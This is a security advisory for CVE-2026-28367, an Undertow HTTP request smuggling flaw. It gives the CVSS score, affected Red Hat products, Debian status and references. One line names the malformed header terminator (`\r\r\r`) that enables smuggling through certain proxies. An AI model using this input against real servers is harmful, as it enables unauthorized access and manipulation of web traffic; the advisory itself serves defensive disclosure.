CVE-2026-28367

EUVD-2026-16694
A flaw was found in Undertow. A remote attacker can exploit this vulnerability by sending `\r\r\r` as a header block terminator. This can be used for request smuggling with certain proxy servers, such as older versions of Apache Traffic Server and Google Cloud Classic Application Load Balancer, potentially leading to unauthorized access or manipulation of web requests.
HTTP Request/Response Smuggling
ProviderTypeBase ScoreAtk. VectorAtk. ComplexityPriv. RequiredVector
NISTPrimary
8.7 HIGH
NETWORK
HIGH
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Base Score
CVSS 3.x
EPSS Score
Percentile: 14%
Affected Products (NVD)
VendorProductVersion
redhatbuild_of_apache_camel_-_hawtio
4.0
redhatbuild_of_apache_camel_for_spring_boot
4.0
redhatdata_grid
8.0
redhatfuse
7.0.0
redhatjboss_enterprise_application_platform
7.0.0
redhatjboss_enterprise_application_platform
8.0.0
redhatjboss_enterprise_application_platform_expansion_pack
-
redhatprocess_automation
7.0
redhatsingle_sign-on
7.0
redhatundertow
-
𝑥
= Vulnerable software versions
Debian logo
Debian Releases
Debian Product
Codename
undertow
forky
vulnerable
sid
vulnerable
Common Weakness Enumeration
References
https://access.redhat.com/security/cve/CVE-2026-28367
https://bugzilla.redhat.com/show_bug.cgi?id=2443260